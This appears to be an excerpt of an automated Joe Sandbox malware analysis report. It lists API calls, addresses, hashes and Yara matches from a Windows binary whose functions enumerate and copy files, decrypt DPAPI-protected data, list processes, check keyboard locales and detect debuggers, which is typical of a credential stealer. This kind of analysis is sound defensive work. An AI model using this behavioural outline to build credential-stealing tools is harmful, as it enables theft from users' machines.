                      • Instruction Fuzzy Hash: 35B14D71A012189BDB28EF60DDD5FEE7B79AF94344F0081A9A40E561A0EF707B49CF91
                      APIs
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                      • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                      • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                      • String ID: \*.*$@
                      • API String ID: 433455689-2355794846
                      • Opcode ID: 7e6bb301145f89db8a2bb91c5631970ae1bf57bdfb02e380825957ab88f67f74
                      • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                      • Opcode Fuzzy Hash: 7e6bb301145f89db8a2bb91c5631970ae1bf57bdfb02e380825957ab88f67f74
                      • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                      APIs
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425114,?,?,?,004251BC,?,?,00000000,?,00000000), ref: 04101B8A
                      • StrCmpCA.SHLWAPI(?,00425264), ref: 04101BDA
                      • StrCmpCA.SHLWAPI(?,0042530C), ref: 04101BF0
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 04101FA7
                      • DeleteFileA.KERNEL32(00000000), ref: 04102031
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 04102087
                      • FindClose.KERNEL32(000000FF), ref: 04102099
                        • Part of subcall function 0411AB87: lstrcpy.KERNEL32(00000000,?), ref: 0411ABD9
                        • Part of subcall function 0411AB87: lstrcat.KERNEL32(00000000), ref: 0411ABE9
                        • Part of subcall function 0411AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0411AC2C
                        • Part of subcall function 0411AC17: lstrcpy.KERNEL32(00000000), ref: 0411AC6B
                        • Part of subcall function 0411AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0411AC79
                        • Part of subcall function 0411AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0411AB6C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                      • String ID:
                      • API String ID: 1415058207-0
                      • Opcode ID: 30c097478159a8560779315bb3f44ea3a312a4c7821e37151fb7f80196eac8b7
                      • Instruction ID: d6dd99cbd7cb03e99b818b680bf0e1f7685623ddb635d1eb8dcf6dd5c7f4fad3
                      • Opcode Fuzzy Hash: 30c097478159a8560779315bb3f44ea3a312a4c7821e37151fb7f80196eac8b7
                      • Instruction Fuzzy Hash: F0122B71911258ABDB19FB60DDD4EED7B39AF54348F4041EAA10A620A0EF707F88CF50
                      APIs
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                        • Part of subcall function 0411AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0411AC2C
                        • Part of subcall function 0411AC17: lstrcpy.KERNEL32(00000000), ref: 0411AC6B
                        • Part of subcall function 0411AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0411AC79
                        • Part of subcall function 0411AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0411AB6C
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 0410E0C5
                      • StrCmpCA.SHLWAPI(?,004214C8), ref: 0410E115
                      • StrCmpCA.SHLWAPI(?,004214CC), ref: 0410E12B
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0410E647
                      • FindClose.KERNEL32(000000FF), ref: 0410E659
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                      • String ID:
                      • API String ID: 2325840235-0
                      • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                      • Instruction ID: aeb71eed099846472ef6588028612b7485b97d7ea096598315d91bb09a08bc8e
                      • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                      • Instruction Fuzzy Hash: 1CF1CC719152589ADB19FB60DDD4EEEBB39AF54344F8041EAA04E620A0EF707F88CF54
                      APIs
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                      • LocalFree.KERNEL32(00000000), ref: 00417D22
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                      • String ID: /
                      • API String ID: 3090951853-4001269591
                      • Opcode ID: f793b8f56b8d187460904af65bf855dbf7dc4249980a78512ab563ebf14e2e71
                      • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                      • Opcode Fuzzy Hash: f793b8f56b8d187460904af65bf855dbf7dc4249980a78512ab563ebf14e2e71
                      • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                      APIs
                      • memset.MSVCRT ref: 0040C853
                      • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,0251CD40), ref: 0040C871
                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                      • memcpy.MSVCRT(?,?,?), ref: 0040C912
                      • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                      • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                      • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                      • String ID:
                      • API String ID: 1498829745-0
                      • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                      • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                      • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                      • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                      APIs
                      • memset.MSVCRT ref: 0410CABA
                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0410CAD8
                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0410CAE3
                      • memcpy.MSVCRT(?,?,?), ref: 0410CB79
                      • lstrcat.KERNEL32(?,00420B46), ref: 0410CBAA
                      • lstrcat.KERNEL32(?,00420B47), ref: 0410CBBE
                      • lstrcat.KERNEL32(?,00420B4E), ref: 0410CBDF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                      • String ID:
                      • API String ID: 1498829745-0
                      • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                      • Instruction ID: cd2567da4fb6787dd5db4a429d09db323a573942678ccddc265a94404ddc4cb0
                      • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                      • Instruction Fuzzy Hash: 3F416278944219EFDB14DFD0DC88BEEBBB8FB44344F1045A9E509A6280E7B46B84CF95
                      APIs
                      • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,025165B0,?,0042110C,?,00000000,?), ref: 0041696C
                      • sscanf.NTDLL ref: 00416999
                      • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,025165B0,?,0042110C), ref: 004169B2
                      • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,025165B0,?,0042110C), ref: 004169C0
                      • ExitProcess.KERNEL32 ref: 004169DA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$System$File$ExitProcesssscanf
                      • String ID: B
                      • API String ID: 2533653975-2248957098
                      • Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                      • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                      • Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                      • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                      APIs
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                      • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                      • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptLocalString$AllocFree
                      • String ID: N@
                      • API String ID: 4291131564-4229412743
                      • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                      • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                      • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                      • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                      APIs
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                      • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 04117E48
                      • LocalAlloc.KERNEL32(00000040,?), ref: 04117E60
                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 04117E74
                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 04117EC9
                      • LocalFree.KERNEL32(00000000), ref: 04117F89
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                      • String ID:
                      • API String ID: 3090951853-0
                      • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                      • Instruction ID: 9ba5192ded03dfc8cbce9fefe85b4d134125bb79d2fedf53d53c137c8636c391
                      • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                      • Instruction Fuzzy Hash: 56412971941218ABDB24DB94DDD8BEEB7B4EF44704F1041E9E009A62A0EB742F85CF90
                      APIs
                      • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                      • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                      • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                      • String ID:
                      • API String ID: 2579439406-0
                      • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                      • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                      • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                      • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                      APIs
                      • IsDebuggerPresent.KERNEL32 ref: 0411BE09
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0411BE1E
                      • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0411BE29
                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0411BE45
                      • TerminateProcess.KERNEL32(00000000), ref: 0411BE4C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                      • String ID:
                      • API String ID: 2579439406-0
                      • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                      • Instruction ID: 4dbf9a257a2e96f7f631a3f5b6294a75f5fa591035c1384350f8fb1819d23072
                      • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                      • Instruction Fuzzy Hash: 7521A3BC9042059FDB14DF69F8C96963BF4FB0A314F504079E90A87264EBB06981EF49
                      APIs
                      • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                      • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                      • String ID:
                      • API String ID: 3657800372-0
                      • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                      • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                      • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                      • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                      APIs
                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 041074B4
                      • RtlAllocateHeap.NTDLL(00000000), ref: 041074BB
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 041074E8
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 0410750B
                      • LocalFree.KERNEL32(?), ref: 04107515
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                      • String ID:
                      • API String ID: 2609814428-0
                      • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                      • Instruction ID: 5b6a7990855880ff615bf4e07e74f6c3bf5c484b6a06fab4cdaf5806dd65948a
                      • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                      • Instruction Fuzzy Hash: B7010075B80208BBEB14DFD4DD45F9D77B9EB45704F108155F705AA2C0D7B0BA018B65
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                      • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                      • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                      • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                      • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                      • String ID:
                      • API String ID: 420147892-0
                      • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                      • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                      • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                      • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04119885
                      • Process32First.KERNEL32(00420ACA,00000128), ref: 04119899
                      • Process32Next.KERNEL32(00420ACA,00000128), ref: 041198AE
                      • StrCmpCA.SHLWAPI(?,00000000), ref: 041198C3
                      • CloseHandle.KERNEL32(00420ACA), ref: 041198E1
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                      • String ID:
                      • API String ID: 420147892-0
                      • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                      • Instruction ID: 8ff19096091749047e57c749e5b4948359c9121f2c0b061e6eef87474fc93eea
                      • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                      • Instruction Fuzzy Hash: D1010CB9A5020CFFDB24DFE4CD94BEDB7F9EB49700F004199A505A6250D774AA40DF51
                      APIs
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                        • Part of subcall function 0411AB87: lstrcpy.KERNEL32(00000000,?), ref: 0411ABD9
                        • Part of subcall function 0411AB87: lstrcat.KERNEL32(00000000), ref: 0411ABE9
                        • Part of subcall function 0411AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0411AC2C
                        • Part of subcall function 0411AC17: lstrcpy.KERNEL32(00000000), ref: 0411AC6B
                        • Part of subcall function 0411AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0411AC79
                        • Part of subcall function 0411AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0411AB6C
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 0410E709
                      • StrCmpCA.SHLWAPI(?,004214F8), ref: 0410E759
                      • StrCmpCA.SHLWAPI(?,004214FC), ref: 0410E76F
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0410EE46
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                      • String ID:
                      • API String ID: 433455689-0
                      • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                      • Instruction ID: 1e67b9fc35a436fda98ebc33250f1c4da38b4d3b17a62b67d5799713e741dcde
                      • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                      • Instruction Fuzzy Hash: DF120B71A112589BEB18FB60DDD5EED7B39AF94348F4041BAA10E520A0EF747B88CF51
                      APIs
                      • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptString
                      • String ID:
                      • API String ID: 80407269-0
                      • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                      • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                      • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                      • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                      APIs
                      • CryptBinaryToStringA.CRYPT32(00000000,041053EB,40000001,00000000,00000000,?,041053EB), ref: 04119127
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
